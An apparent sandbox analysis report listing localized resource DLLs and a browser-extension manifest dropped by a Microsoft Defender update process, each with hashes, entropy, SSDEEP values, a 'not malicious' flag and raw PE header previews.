File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.802281589367443
Encrypted:	false
SSDEEP:	768:7r+0QI4V/O4klevfq7mvqaI216icZKfEflxZFcR1Pga1zR3:qCcHPVZ
MD5:	628870D988EFBFC39C06E7BA62495FFE
SHA1:	A3A302666A07A5FE0D7FAD69DE9B1AFBD8F91536
SHA-256:	161D58719676884DB3BDFEA9A5770A55EC7BEBE839D97B6ECA3D20EC5A3D6B2D
SHA-512:	E04ECDC7226C9B18FC86F51F6B70CD6E13345C8F2A8DFEE0845350777580CF46A738271E949B07216D83A647685DAD3666A7F5C2BA36451E11DB1545AFD9F7E9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................:2....@.......................................... ..X................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ar-SA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	25320
Entropy (8bit):	5.568099766445783
Encrypted:	false
SSDEEP:	384:7r8teWannr4pG2RI96HUy/oV/m9HlCWS8/WWRDBRJWiZEQmDWlGszRo:7r5nnr4pG2RI9AoV+9HVbR1PWJ1zv
MD5:	53F858DC25ADF3684E7E025277A57023
SHA1:	A51A05FFA31010C1B28A63B5B7BBB490239BC1C6
SHA-256:	D57524C7B0D7FE779DC3803F041C341F818381E19703D32BAA988F1697D1175C
SHA-512:	0A7E6808CDB2EB6E31596218FE42B2BFEE9B067B22913D43A1E1C1D5B1832C3018B04FC633E8F9223378216372235988FE15F2D9FA074AC595046542FF54B9D1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........@...............................................`............@.......................................... ...>...........B... ...........................................................................................rdata..p...........................@..@.rsrc....>... ...>..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..H9...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\as-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.632188784867651
Encrypted:	false
SSDEEP:	768:7rOPaPbPAPCPLTPnPWPkP8Pe1lOO6FD6kKOy6OQOQ4LuYz3KUrZPk/4hPrPDV86/:xcNgPHPwc
MD5:	D359F26A958650D3B5A28495DC39D409
SHA1:	3EF8B8E1C4E876E1C2A6157AE92C65E629C7559C
SHA-256:	F2A33F57BED6013E9850AB150C83577862DE7FADA3CAA1C87C94100F486D92A7
SHA-512:	0ED71E0EA79B7AA96E8358B28DDE2C7C419C526168271355AA73C281BB123E9306FE1F3A94A1A9A7BBD4234E54CB0760BA31D6BBF5E13BEB8305460000C3685D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p............@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..(H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\az-Latn-AZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.231249488030954
Encrypted:	false
SSDEEP:	768:7rOj1wdJ4v3YFcFqFkFJFgFGFYFhrVbFRdtR1Pl/DM2:Gj1gFcFqFkFJFgFGFYFlVbFbtHPl/w2
MD5:	06A297C9B8293DA4AC3B56D304874F2A
SHA1:	A7B7F072E7A7A5837382293CD65ABF10088E6EA9
SHA-256:	C5D1763D4F042FE777BB02E47E26F76EC9008AF689679BDA6480E1541A1158BF
SHA-512:	AB2C0EACEE65A2CC104DE75C86311374227E3E91E8BCEBED89F729B07681E2A79D88BC73F507C471666FCE8753DC18E83C2C37B27D8088D1563EC8634B05EBD8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bg-BG\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64744
Entropy (8bit):	4.650844920332313
Encrypted:	false
SSDEEP:	384:7rTz3pDQHT+ddcOc1jzG/by+psEV++OfYcYQIhJ2YIqqO7a1BQdWhjRDBRJ4NKgY:7rtuDOYz01TO29VqhQ4jR1P4tl51VQ
MD5:	DDFB72494C7DAB2C2DCBBF58F1384BB8
SHA1:	474F7CDEDFEF2B0E5765B5EF151A8DEA7845BE68
SHA-256:	7E28FA6FC9DD05652F3DDCC4B9BC54469DD44995EC69EF149B9477B4C0CE53D6
SHA-512:	6AD3EBF149C1C9A5BE7FF012A2AEE38DD6D2EFADE2EE73E1F41E45393180DA13BB1FB8E079E6D8CBE5D51259A1D57351738D037A3589FF50CF7577C372A1C521
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................H....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bg-BG\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.351887592007768
Encrypted:	false
SSDEEP:	384:7rTpJ4DyEhyXvb1vstW33294WS8/WPRDBRJfJs/Al3IKO:7rV4huvUVPmR1PK/KO
MD5:	6275E196D18A7E2E298B30AF3ED5C880
SHA1:	240364A589E90A9DE843CBB9C34555A2E4274793
SHA-256:	06B162090901AC0604283E1CE2EC1928E0A7C651332C3E7BE593E438DB02AC88
SHA-512:	54BFC5FA5D4DB45538E0C60454AB1E58371338C982496A19485BC76A3047E0264F2B30070B5A4E1A30B865FE38A95FF36C758790E5B8C8EE5B8ACEAFA200AEA8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p............@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bn-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.555067530565591
Encrypted:	false
SSDEEP:	768:7ruX333303MqF6WVHrS3snXlFwDzffQ6SMn6vvvU98Io/PI44te1eF3r+YR1Ph:F64HK7+YHPh
MD5:	231D5D0EC76C7498E5A94E120943699F
SHA1:	D8DF8518946F02F5C51860983188C574B10A9180
SHA-256:	1807A40E971F9A586671F144CFB34404D2AFAA027EC9E670E323BA70577FC9E4
SHA-512:	E62D8578FA404E1753CA5225AD6DBFDA8AA392B4340C4DCDE8E310CAE522A4960536AD9192D8A18DF47030C8380056D896ECC378A84F3EF9BA2192B6C7DC0024
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p......\b....@.......................................... ...O...........T... ...........................................................................................rdata..p...........................@..@.rsrc....O... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bs-Latn-BA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.05898751052722
Encrypted:	false
SSDEEP:	384:7rgBdq0HifHAHyuJv3JSF666n/o001ZAGmIbmLWS8/W+RDBRJilSlGsM3k2:7r8dYuJYyn/oVv3zjR1PihX5
MD5:	6C4B5C9E187A6B13C39FAA41C742EDD6
SHA1:	30A5B3B8826EE8741CD09D5AD65D6BAA2DC68BB0
SHA-256:	9C776358CD7A47CCBA26F992472A0A739C6F0C152B89B5AEDDCACA8AC43684F0
SHA-512:	16E9795DD6EF63CACA9C7D7E96BF0CB2C0177641213F387586D4243E159E6464B1E736A1892071B80433F7F825A0530CEEB72EBABB4F4F7EB3802879AFED916F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........L...............................................p............@.......................................... ...I...........N... ...........................................................................................rdata..p...........................@..@.rsrc....I... ...J..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...D...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ca-ES-valencia\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.978741308381524
Encrypted:	false
SSDEEP:	768:7rleQQmmfwxJvYOmnVmJYlEmnVY4mxYCOAlc50EsUpVJg94T4OCaTR1PD/1zx:9eFlNTHPDdx
MD5:	C9E9AE82C7782DC0E66BFE5EFEFF336C
SHA1:	676F16943FAB27A375C2E3F3AC0CE921AB751367
SHA-256:	CA202FDD69FB81DBF24708D144E942FC10ACCFA4703BE979AAD55FD88B62E7F6
SHA-512:	AE90BB4093A1879E8876D45262004AD10FCC9BE13D4BE1F9164C866827F2C48C28CE170274CDA4D0C13C3CE2EBF8106E5D374300F51EDEDE6E580F38BADD75CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p............@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ca-ES\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67816
Entropy (8bit):	4.158464028484954
Encrypted:	false
SSDEEP:	768:7rDj4mcWQ7uhqYxT352UL2dSsq5/8Vczyuz9ppJ4cwQRMC20hvQii98+wEH4cdqd:7WQ170VcfRMZgqHPO/
MD5:	D2A485200AE94654A45301149D87A8A1
SHA1:	501C933C5BC3D5DC9AFADC86FC73D1567DCDADDD
SHA-256:	9164442B33BAA1DAAF4609189D8169CA9DFA67BB673683F66A49ED9145DA7585
SHA-512:	7D763413C96FB4197216F03028046A510E5393EE9789E827DC9665243889491A05E8A4ACDAF813E3E8773E5E952F53960C02AC86FBD4C83EE402B5DEF44CD17B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ca-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.970820382866816
Encrypted:	false
SSDEEP:	768:7rAjdTb3dD4GbRVgWV9Hw2b4HX4bi2KwNDFWhGWD3IDRU0MZ8HoR1PX6Lz:Yj0KoHPKf
MD5:	0EC7F6A6BDC86183AA58893F948989A2
SHA1:	ABFAB912AF53106A82CD50158EB147F5EC4A3456
SHA-256:	02FC3320529F9A51D88030CE7C03AC3A62517B8141768FE001B995DCFBB202F4
SHA-512:	CD6FC83F8F2A5F676ED60655BB607D2D6DA7D4A274A809D1CAB0854B2257E20CD7D4E0D0FC0C1A1AFD4D2E99F8F0A99A7B89C2C2EDF2F741F7DED7B3AE1DFAD1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p.......S....@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..8J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\com.microsoft.defender.be.chrome.json Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	4.8011887903612696
Encrypted:	false
SSDEEP:	6:3HWSjKNde/Ott+dmvVnEuLrORVCqwvFFaFlLulkNCB+SrxxLxeNCWHyLIo:L2kO+WnEeMOUlLAjB/1N/0o
MD5:	60A2FC65D3CC1D3DE9ECD2C5319738FC
SHA1:	873D18E03523BBE80D1410AA475ED6CC2DAF0D9D
SHA-256:	6C6F52B13235148AF305BD614779EA885C00B64D0BB7CC764E3C67198CC524A2
SHA-512:	36E8930108DA1B953DC07809A9E670F923A4F07EAC9AD2A229844E556595CE7383F35001E43AA6877FF42D9BD42C55BB2BF0ED05E058D4E8CFF65E6B2B7A7BFD
Malicious:	false
Preview:	{.. "name": "com.microsoft.defender.browser_extension.native_message_host",.. "description": "Native host for Microsoft Defender Browser Extension",.. "path": "mpextms.exe",.. "type": "stdio",.. "allowed_origins": [.. "chrome-extension://echcggldkblhodogklpincgchnpgcdco/",.. "chrome-extension://lcmcgbabdcbngcbcfabdncmoppkajglo/".. ]..}

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cs-CZ\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62696
Entropy (8bit):	4.4300925979744425
Encrypted:	false
SSDEEP:	768:7rpChXzlbrS2tVdqSp3wbjfKMoW4EEEddewzR1PiM5md:hChXz1Lf04SjfKMoW4t8ewzHPlmd
MD5:	71EA670E1886321DDDDF005D7B47A7FD
SHA1:	FB9AA4F04C6744123C2E38DE746983C1B82A6F00
SHA-256:	BC031DC51AE7128AEE1ADCCDA0F7ACC9EB3BBE8DE121B206B0E9801E956F82B7
SHA-512:	3BB516F32FC0516DE97CB520AED0E3976BC201183144AF54FF392BB73237767C50794F923C84E738D82A7430C6660EE7301891CACD1517F17DBB6C6391B46070
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................+.....@.......................................... ..l................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cs-CZ\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	4.606804840809272
Encrypted:	false
SSDEEP:	768:7rdMyciFk6/zRyodW7/obSxnjEBIR1PbzT:lMyciFk6/zRy+bSxjwIHPPT
MD5:	C40C173214A061E8BCDF28F6328CAD40
SHA1:	A525D0203A18D9011712A7F6AD89FD84D90B5747
SHA-256:	17B281694628800A6B1541826B912F8FF0788D171A900F6DF4BA8A6AC01B3A46
SHA-512:	B72D26D86B1D28308686A1DD0AE513594D9875AD809C891B9B063220748470154846339D25C89B4EC904F838AD47B0438EB22925CD7C2E70C3686961476760AC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cs-CZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28408
Entropy (8bit):	5.215365684019082
Encrypted:	false
SSDEEP:	768:7rIXE4QWX0YNoE8gZ04pC5DbUV4qFR1Peizz:Q04QWX0YNojgZ04pC5DbUV4qFHPeYz
MD5:	FFE6628B2AD343CDA7FDFEF38B84B48C
SHA1:	36A72C17996D63635B184CDEC836022A2FD275C7
SHA-256:	B5E81F2E96B81367B16D77BDB21FF45C92B880DF501AD17FEE4F8B1E756C636D
SHA-512:	B20694CA2B5E009BCD981C8FD3E95CF25E16E9293001CCCB53DEC2ABDE6A31535F9213492279BB9527DF0A86B0489DAB7014F3F2A67A3D6D26F26DD1B942B481
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........L...............................................p.......7....@.......................................... ..DH...........N... ...........................................................................................rdata..p...........................@..@.rsrc...DH... ...J..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...C...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cy-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30456
Entropy (8bit):	4.937872667222882
Encrypted:	false
SSDEEP:	384:7r9i3aB5tg/hPb1Y2YQYTZYxgaM3cNqng73m3cX3u3cjgTyTKT3TsjxTPTBTnTb2:7rhXP9KV7XcdLks3yRR1Pgz3
MD5:	CF1FB8FA2725C2DC530AE045F1ED8A6B
SHA1:	B64794C057E7F9F1F4A5DB0A9164FE21EFB32151
SHA-256:	EEB5D85389F768042AFEB2B1203BCC151069F53DAFED28DB404122013041241F
SHA-512:	259CC37B8488D7B9244450864F4AD2ABDC9A7C8355833F5A1628D5DC4A3123A2FCDBDCC2B8169DA2613527D8885C081915651B41228DEDAC6E5E70D1CC4F9C4D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........T......................................................fT....@.......................................... ..TQ...........V... ...........................................................................................rdata..p...........................@..@.rsrc...TQ... ...R..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\da-DK\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63720
Entropy (8bit):	4.2102783984881755
Encrypted:	false
SSDEEP:	768:7rRXQqbVuA8rmOXbO5OKi9OUsUR1P11zf:JXQqBuA8b6UHPPf
MD5:	BB1447340673FA9F6B96A9987290F278
SHA1:	C43D250E3BEF83C88A2BB5EA7FA68F54895C2FA5
SHA-256:	A166D52AA0AB379DE33CF5796A5B1861246A36BB8B17D8C87E0F0529338C0AC3
SHA-512:	F0D83F03C31E45C079E1ADE32A4801A6C5B8F71D23421E6D08C655E1216F4A6A3E58F8930C1F3D72CAB8FF25536017D2F1D458FCB97FB848E83830B331A3C3C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................K....@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\da-DK\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54520
Entropy (8bit):	4.3994496582380975
Encrypted:	false
SSDEEP:	384:7rpjcx80WKqt9o5uDwepIRXVCQECoz0NKERDH9rLdGtKWfwLW6RDBRJiOhl95UN:7rWxnkErR1PZzUN
MD5:	849192FB21F761073C9ED4A3F5BD4688
SHA1:	A9AAA641C02833616CC0165FA47499DFC1269D7A
SHA-256:	1EAC8A8C05B8AAFB4505A7828D7E7F98567BD0C71DEE4E08AF467F31D34A9828
SHA-512:	F5216D11DC25B246567A1F31B1613533EB57A28FC88AAF7D1064426D6E9488C597F5F3BC7DCA29D3FEC4D239EB86675476488EAE4309F239649740F9D739297E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................V.....@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\da-DK\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.034399544515469
Encrypted:	false
SSDEEP:	384:7rV9LJoeS3TVu8td5dCWS8/WtRDBRJjfVslGsJ/Qw:7r7LEVHJIR1PjzLw
MD5:	C63C9C4C55D3B4172BADC2FB45014D5D
SHA1:	DC46D629995E862BA72C80ADC45F62DAD3590728
SHA-256:	88346BDE6D5FC1C0CADFA5755944F466F8960C9CC17A5339851A2BAD42376C70
SHA-512:	F838B0338C194BA2E820B10EC4E2397511AE61A14C6684AF99996DCABED5D225F9672BC4053DF9AAB6F2D586806908DC07BA43C2ADC191081C5F3E5D58E1485D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ..XJ...........P... ...........................................................................................rdata..p...........................@..@.rsrc...XJ... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...E...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70392
Entropy (8bit):	4.18694461018496
Encrypted:	false
SSDEEP:	1536:g9J3VugBgOPS611GRF9QRquPJAQ7GyHPvt:g9J3VugBgOPS611s/QRquRAQ7Ggd
MD5:	FF00B121B166AB8E4857EABE4AAB9BCC
SHA1:	8CA305D4979F693BCC8425A972438A9074B92C5D
SHA-256:	9285FDDC5E40919E750A95C255588332876547495F6E245BAD983D612DAA4704
SHA-512:	2CC52CBB0EDCAD8BBAFD934E3B259048250F0DF4687FE8FC3F9B3764071F5E1E708FA870EB91D8868687F8A91677C9EBA287AAC195478C613042C97B33495286
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..@................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54504
Entropy (8bit):	4.451774666927673
Encrypted:	false
SSDEEP:	768:7rBOW84CvPTO3VUtmUz8J0GXv3Y1VKLhR1P+pa:v84kt9qAohHP+pa
MD5:	7AF483C2AFFDD95213DDDC495D001DC0
SHA1:	C65458CBD4209A7B09129D5FDD171C758D6A7991
SHA-256:	155EC9FBBE052BCCF189B89EF0F802DA48547D107A26A9E342BF9A23B4F1ADFF
SHA-512:	6DF51B3E38AFB35BCAA066F3DDD56497B9E104D768C5AB1348A82BB7F1B70ED332CACCF302699AA97CC3095252B915F209BAD52F2495A31210CF90DF1940205F
Malicious:	false
